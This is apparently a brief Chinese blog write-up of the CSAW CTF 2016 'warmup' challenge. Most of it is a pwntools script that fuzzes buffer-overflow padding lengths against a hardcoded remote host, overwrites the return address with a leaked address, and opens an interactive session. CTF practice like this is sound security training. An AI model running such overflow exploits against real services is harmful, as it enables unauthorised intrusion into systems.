warmup

题目来源: csaw-ctf-2016-quals

题目描述:暂无

 

 

没有附件的一道题目

连接远程之后给了一个地址,所以考虑fuzz

exp如下:

from pwn import *

addr = 0x40060d

def fuzz(io, num, mode):
    payload = b'a' * num
    if mode == 0:
        payload += p64(addr)
    elif mode == 1:
        payload += p32(addr)
    io.recvuntil('>')
    io.sendline(payload)

for i in range(1000):
    for j in range(3):
        try:
            r = remote('111.200.241.244', 54389)
            info('try: num = ' + str(i) + ' mode = ' + str(j))
            fuzz(r, i, j)
            flag = r.recv()
            info('get flag:' + str(flag))
            r.interactive()
        except:
            r.close()
        

 

posted @ 2021-08-16 20:43  hktk1643  阅读(52)  评论(0编辑  收藏  举报